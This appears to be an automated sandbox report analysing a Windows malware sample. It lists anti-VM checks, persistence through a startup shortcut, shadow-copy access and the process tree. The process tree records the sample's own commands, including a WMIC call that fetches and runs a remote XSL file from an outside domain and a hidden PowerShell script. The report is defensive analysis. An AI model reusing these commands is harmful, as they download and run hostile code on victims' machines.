6cd246cd910e33eaee00e3d138bc49fcf85562b5f8c394d4b092372d25cc0eac

Analysis

max time kernel
130s
max time network
149s
resource
win10v191014

Sharing

Copy URL

Twitter E-mail

General

Target

Supergevaarlijkk.zip
Sample

191029-7v9yqqxm3n
SHA256

6cd246cd910e33eaee00e3d138bc49fcf85562b5f8c394d4b092372d25cc0eac

Score

N/A

Malware Config

Signatures

Checks processor name in registry (likely anti-VM) 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	pid	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	4568	WerFault.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4936	msiexec.exe

Suspicious use of AdjustPrivilegeToken 58 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4936	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4936	msiexec.exe
Token: SeSecurityPrivilege	5068	msiexec.exe
Token: SeCreateTokenPrivilege	4936	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4936	msiexec.exe
Token: SeLockMemoryPrivilege	4936	msiexec.exe
Token: SeMachineAccountPrivilege	4936	msiexec.exe
Token: SeTcbPrivilege	4936	msiexec.exe
Token: SeSecurityPrivilege	4936	msiexec.exe
Token: SeTakeOwnershipPrivilege	4936	msiexec.exe
Token: SeLoadDriverPrivilege	4936	msiexec.exe
Token: SeSystemProfilePrivilege	4936	msiexec.exe
Token: SeSystemtimePrivilege	4936	msiexec.exe
Token: SeProfSingleProcessPrivilege	4936	msiexec.exe
Token: SeIncBasePriorityPrivilege	4936	msiexec.exe
Token: SeCreatePagefilePrivilege	4936	msiexec.exe
Token: SeCreatePermanentPrivilege	4936	msiexec.exe
Token: SeBackupPrivilege	4936	msiexec.exe
Token: SeRestorePrivilege	4936	msiexec.exe
Token: SeDebugPrivilege	4936	msiexec.exe
Token: SeAuditPrivilege	4936	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4936	msiexec.exe
Token: SeChangeNotifyPrivilege	4936	msiexec.exe
Token: SeRemoteShutdownPrivilege	4936	msiexec.exe
Token: SeUndockPrivilege	4936	msiexec.exe
Token: SeSyncAgentPrivilege	4936	msiexec.exe
Token: SeEnableDelegationPrivilege	4936	msiexec.exe
Token: SeManageVolumePrivilege	4936	msiexec.exe
Token: SeImpersonatePrivilege	4936	msiexec.exe
Token: SeCreateGlobalPrivilege	4936	msiexec.exe
Token: SeRestorePrivilege	5068	msiexec.exe
Token: SeTakeOwnershipPrivilege	5068	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3784	WMIC.exe
Token: SeSecurityPrivilege	3784	WMIC.exe
Token: SeTakeOwnershipPrivilege	3784	WMIC.exe
Token: SeLoadDriverPrivilege	3784	WMIC.exe
Token: SeSystemProfilePrivilege	3784	WMIC.exe
Token: SeSystemtimePrivilege	3784	WMIC.exe
Token: SeProfSingleProcessPrivilege	3784	WMIC.exe
Token: SeIncBasePriorityPrivilege	3784	WMIC.exe
Token: SeCreatePagefilePrivilege	3784	WMIC.exe
Token: SeBackupPrivilege	3784	WMIC.exe
Token: SeRestorePrivilege	3784	WMIC.exe
Token: SeShutdownPrivilege	3784	WMIC.exe
Token: SeDebugPrivilege	3784	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3784	WMIC.exe
Token: SeRemoteShutdownPrivilege	3784	WMIC.exe
Token: SeUndockPrivilege	3784	WMIC.exe
Token: SeManageVolumePrivilege	3784	WMIC.exe
Token: 33	3784	WMIC.exe
Token: 34	3784	WMIC.exe
Token: 35	3784	WMIC.exe
Token: 36	3784	WMIC.exe
Token: SeDebugPrivilege	4604	powershell.exe
Token: SeRestorePrivilege	4568	WerFault.exe
Token: SeBackupPrivilege	4568	WerFault.exe
Token: SeDebugPrivilege	4568	WerFault.exe
Token: SeSystemEnvironmentPrivilege	4668	svchost.exe

Drops file in system dir 40 IoCs

description	ioc	pid	Process
File created	C:\Windows\Installer\9579.msi	5068	msiexec.exe
File opened for modification	C:\Windows\Installer\9579.msi	5068	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	5068	msiexec.exe
File created (read-only)	C:\Windows\Installer\MSIAD85.tmp	5068	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIAD85.tmp	5068	msiexec.exe
File deleted	C:\Windows\Installer\MSIAD85.tmp	5068	msiexec.exe
File created (read-only)	C:\Windows\Installer\MSIB76A.tmp	5068	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB76A.tmp	5068	msiexec.exe
File deleted	C:\Windows\Installer\MSIB76A.tmp	5068	msiexec.exe
File created (read-only)	C:\Windows\Installer\MSIC0A2.tmp	5068	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC0A2.tmp	5068	msiexec.exe
File deleted	C:\Windows\Installer\MSIC0A2.tmp	5068	msiexec.exe
File created (read-only)	C:\Windows\Installer\MSIC5D3.tmp	5068	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC5D3.tmp	5068	msiexec.exe
File deleted	C:\Windows\Installer\MSIC5D3.tmp	5068	msiexec.exe
File opened for modification	C:\Windows\Installer\	5068	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	5068	msiexec.exe
File created	C:\Windows\TEMP\~DFA16CD51B04584168.TMP	5068	msiexec.exe
File created	C:\Windows\Installer\SourceHash{B7E63CAC-805B-4255-A63C-38D579B3EEAB}	5068	msiexec.exe
File created	C:\Windows\TEMP\~DFE2E8EB85B1747B89.TMP	5068	msiexec.exe
File created (read-only)	C:\Windows\Installer\MSIC864.tmp	5068	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC864.tmp	5068	msiexec.exe
File created	C:\Windows\TEMP\~DF4B61673330EC74D5.TMP	5068	msiexec.exe
File created	C:\Windows\TEMP\~DFF6F148A4C935344E.TMP	5068	msiexec.exe
File deleted	C:\Windows\Installer\MSIC864.tmp	5068	msiexec.exe
File created	C:\Windows\TEMP\~DFAC2F3A1EF47E3525.TMP	5068	msiexec.exe
File created	C:\Windows\TEMP\~DFFFD104EBFAB5F9A1.TMP	5068	msiexec.exe
File created	C:\Windows\TEMP\~DF58873D9B0BD93ED3.TMP	5068	msiexec.exe
File created	C:\Windows\TEMP\~DF195997050EAE7974.TMP	5068	msiexec.exe
File deleted	C:\Windows\Installer\9579.msi	5068	msiexec.exe
File created	C:\Windows\TEMP\~DF99D98093284899D6.TMP	5068	msiexec.exe
File created	C:\Windows\TEMP\~DFAF927D6069972A36.TMP	5068	msiexec.exe
File created	C:\Windows\TEMP\~DF6045623F078ABCB7.TMP	5068	msiexec.exe
File created	C:\Windows\TEMP\~DF0C6D0569BCEEB1EB.TMP	5068	msiexec.exe
File deleted	C:\Windows\Installer\inprogressinstallinfo.ipi	5068	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	4608	svchost.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	4608	svchost.exe
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	4608	svchost.exe
File opened for modification	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-2.tmp	4608	svchost.exe
File created	C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-2.tmp	4608	svchost.exe

Drops startup file 1 IoCs

description	ioc	pid	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nvsmartmaxapp.lnk	4604	powershell.exe

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4568 created 712	4568	WerFault.exe	87

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Modify Registry

T1112

description	ioc	pid	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\0217922CA1B6F0BD0F1D7FF6E7BDC29B2FAAA060	4652	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\0217922CA1B6F0BD0F1D7FF6E7BDC29B2FAAA060\Blob = 0300000001000000140000000217922ca1b6f0bd0f1d7ff6e7bdc29b2faaa06020000000010000001e0300003082031a308202daa003020102020900bebbcc34c2a99a43300906072a8648ce38040330233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579301e170d3133303730323231313033375a170d3138303730313231313033375a30233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579308201b63082012b06072a8648ce3804013082011e02818100f3e2f36f1d350881275aa7c5f7e8c357a650ef20dc32b53ca779842dcbfc152228c1e764019c55ca7bf8a0116ccca93636dc681161c8188f79f985cce6b1a8aaf44dffd3ea6c2d60fd80eefd084c4a09c4b9784cf3ccf638ca8cca937fbaee6d472cad4ee2d5ddda4e653184e512d9846c770abdc5e4945ce5686c513bf38f150215009fd788154563df5ca8c78a354278fc70394e37fb0281803a769d0b37f784c6f1af668ffa7b2d0b53debfac0e64db8244f4c1793e9e34cac020047d3df0563ddefd171ab2fd6af49f7d3616c285cc422590c3a6f0cae0dd3987c3f310a5efe0f127f406416e983ec649e835e1006e2fccf48474b90e82cb67cb62608ed42f2ec45b71803d63dbd63101b8a490fd1ab091976ef4bb176a65038184000281806ed2b8b1d12b8846c32236833769cb554bcd3809bfd684c8bdacfb500ca500327185560ccc83d9ae13580fa72aa9fd36eccaa9fd79861245cc591b4e7dcf047847e82d5946829638473927236142f9aa5d99ec33714677492e39784264f486ada6b028837db599a58e512e376c52470b1cb8991793783499e772de6678db2be3a38198308195301d0603551d0e0416041446d2c25b3e033423792e171c0019284c71102b6430530603551d23044c304a801446d2c25b3e033423792e171c0019284c71102b64a127a42530233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579820900bebbcc34c2a99a4330120603551d130101ff040830060101ff020100300b0603551d0f0404030201c6300906072a8648ce380403032f00302c02140b7937349b7de4b8750855cd40ef4bbb2d3145a9021417408a13071294c11b2c9e5195e411eb86a54864	4652	svchost.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\2C85006A1A028BCC349DF23C474724C055FDE8B6	4652	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\2C85006A1A028BCC349DF23C474724C055FDE8B6\Blob = 0300000001000000140000002c85006a1a028bcc349df23c474724c055fde8b620000000010000001f0300003082031b308202dba003020102020900bea900b78b6470ef300906072a8648ce38040330233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579301e170d3136303530393230343035355a170d3231303530383230343035355a30233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579308201b73082012c06072a8648ce3804013082011f02818100a9a733a14a9c9d68b075811ddf231c514c0cdc328087287fd11f1d6eb125b536b88cd5579591bb6e7545b45b98eaa8cdeb0ae38be4781c7d36d97b3d2bb45b9449142130f68e112c6d09e343160cd0d0fbb8aabc8b0cea5b2066b0e3368589dadfd8ae79e9d2bdc5f5836d8fb278be02c260d3a592bda471f1a28e2f925e8b57021500a86236ce56c046d8f3fac8a6bb63e28543e45753028181009eb2085cfbe32af5a25dddeebdeede0d2f2a4475bbca802c7952e078421b4b85528fff6242aba7c75c1e40695db3be422d982972b638679c1b9314a39cad44577d2a71ee3e5738176062d9200be5efcc1b00c16b1b48e8b1771c01b9aa54ce0b5f6679caed531293d92ef822695e20264e23b188489ea3e6dc1c36a90fa0668903818400028180168cdc3d074cf4c9accef116317b85adf100f2454c9ca23203ad296928bb08879c48096c44bcb0dc3f49f69456e871dd45980eacabe735c63ade0281e7a48aca3eabde71aab64c04a6ef72c352be936692c8970a3c7615370d549b931c289810278f5284914f6965df0d93ce0a980ca5dce26e75a331c4da939af3e051d252d3a38198308195301d0603551d0e04160414a353ea5503cd0a69c45870b6ffe3912091c79f7a30530603551d23044c304a8014a353ea5503cd0a69c45870b6ffe3912091c79f7aa127a42530233121301f06035504031318546f6b656e205369676e696e67205075626c6963204b6579820900bea900b78b6470ef30120603551d130101ff040830060101ff020100300b0603551d0f0404030201c6300906072a8648ce380403032f00302c021468e7a7cdfca81ff04d476fa11b781b7696d1fbf402145ef1c64374ebde4c309b59a9deeb99e556fd1477	4652	svchost.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
5068	msiexec.exe
4604	powershell.exe
4568	WerFault.exe
4836	svchost.exe

Uses Volume Shadow Copy WMI provider 3 IoCs

ransomware

description	ioc	pid	Process
Key opened	\Registry\Machine\Software\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C}	4604	powershell.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C}	4604	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{890CB943-D715-401B-98B1-CF82DCF36D7C}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}	4604	powershell.exe

Uses Volume Shadow Copy Service COM API 3 IoCs

ransomware

description	ioc	pid	Process
Key opened	\Registry\Machine\Software\Classes\CLSID\{E579AB5F-1CC4-44B4-BED9-DE0991FF0623}	4604	powershell.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}	4604	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E579AB5F-1CC4-44b4-BED9-DE0991FF0623}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}	4604	powershell.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 4836 created 712	4836	svchost.exe	87

Program crash 1 IoCs

pid	Process
4568	WerFault.exe

Discovering connected drives 3 TTPs 1 IoCs

ransomware

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	pid	Process
File opened (read-only)	\??\C:	4936	msiexec.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 5068 wrote to memory of 68	5068	msiexec.exe	75
PID 68 wrote to memory of 3784	68	MsiExec.exe	77
PID 5068 wrote to memory of 3756	5068	msiexec.exe	79
PID 3784 wrote to memory of 4604	3784	WMIC.exe	80
PID 3756 wrote to memory of 4672	3756	MsiExec.exe	82
PID 3520 wrote to memory of 2992	3520	SppExtComObj.exe	84
PID 4604 wrote to memory of 4864	4604	powershell.exe	86
PID 4864 wrote to memory of 712	4864	nvsmartmaxapp.exe	87
PID 4836 wrote to memory of 4568	4836	svchost.exe	89

Checks processor information in registry (likely anti-VM) 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	pid	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	4568	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	4568	WerFault.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Modify Registry

T1112

description	ioc	pid	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0"	2232	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1"	2232	svchost.exe

Loads dropped DLL 3 IoCs

pid	Process
3756	MsiExec.exe
4864	nvsmartmaxapp.exe
712	wmplayer.exe

Executes dropped EXE 2 IoCs

pid	Process
4672	lcC0B0.tmp
4864	nvsmartmaxapp.exe

Uses Task Scheduler COM API 1 TTPs 19 IoCs

persistence

Query Registry

T1012

description	ioc	pid	Process
Key opened	\Registry\Machine\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	4604	powershell.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	4604	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}	4604	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	4604	powershell.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\	4604	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	4604	powershell.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	4604	powershell.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32\InprocServer32	4604	powershell.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32\	4604	powershell.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32\ThreadingModel	4604	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	4604	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	4604	powershell.exe
Key opened	\Registry\Machine\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	4604	powershell.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32\Class	4604	powershell.exe
Key opened	\Registry\Machine\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\LocalServer32	4604	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	4604	powershell.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\AppID	4604	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	4604	powershell.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	4604	powershell.exe

Checks system information in the registry (likely anti-VM) 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	pid	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	4568	WerFault.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	4568	WerFault.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	4212	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	4212	svchost.exe

Checks SCSI registry key(s) (likely anti-VM) 3 TTPs 12 IoCs

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	pid	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000	4652	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID	4652	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs	4652	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000	4652	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID	4652	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs	4652	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000	4668	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID	4668	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs	4668	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000	4668	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID	4668	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs	4668	svchost.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	pid	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	4568	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	4568	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	4568	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	4568	WerFault.exe

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\91B5DB3C0CCBD68BD04C24571E27F99D.msi
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of AdjustPrivilegeToken
- Discovering connected drives
PID:4936

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost
1⤵
PID:5056

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
- Drops file in system dir
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
1⤵
PID:5116

C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding 22B17CD028F8275C8F6FA32DFD50D401
1⤵
- Suspicious use of WriteProcessMemory
PID:68

C:\Windows\System32\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3784

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 7FE29F02F3E2E41078CB647856D8204D
1⤵
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
PID:3756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
1⤵
- Suspicious use of AdjustPrivilegeToken
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Uses Volume Shadow Copy WMI provider
- Uses Volume Shadow Copy Service COM API
- Suspicious use of WriteProcessMemory
- Uses Task Scheduler COM API
PID:4604

C:\Users\Admin\AppData\Local\Temp\lcC0B0.tmp
"C:\Users\Admin\AppData\Local\Temp\lcC0B0.tmp"
1⤵
- Executes dropped EXE
PID:4672

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:3520

C:\Windows\System32\SLUI.exe
"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
1⤵
PID:2992

C:\Users\Admin\AppData\Roaming\SvTBPrJ\nvsmartmaxapp.exe
"C:\Users\Admin\AppData\Roaming\SvTBPrJ\nvsmartmaxapp.exe"
1⤵
- Suspicious use of WriteProcessMemory
- Loads dropped DLL
- Executes dropped EXE
PID:4864

C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
1⤵
- Loads dropped DLL
PID:712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:4836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 712 -s 652
1⤵
- Checks processor name in registry (likely anti-VM)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Program crash
- Checks processor information in registry (likely anti-VM)
- Checks system information in the registry (likely anti-VM)
- Enumerates system info in registry
PID:4568

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
- Modifies system certificate store
- Checks SCSI registry key(s) (likely anti-VM)
PID:4652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k wsappx -s ClipSVC
1⤵
- Suspicious use of AdjustPrivilegeToken
- Checks SCSI registry key(s) (likely anti-VM)
PID:4668

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wisvc
1⤵
PID:3444

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Drops file in system dir
PID:4608

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:2028

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
1⤵
- Checks system information in the registry (likely anti-VM)
PID:4212

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup
1⤵
PID:2128

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
1⤵
- Windows security modification
PID:2232

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

MITRE ATT&CK Additional techniques

T1130
T1089

Replay Monitor

Loading Replay Monitor...

Downloads

memory/4568-19-0x0000000004C10000-0x0000000004C11000-memory.dmp

Filesize
4KB

Download
memory/4568-20-0x00000000053B0000-0x00000000053B1000-memory.dmp

Filesize
4KB

Download
memory/4568-21-0x00000000054C0000-0x00000000054C1000-memory.dmp

Filesize
4KB

Download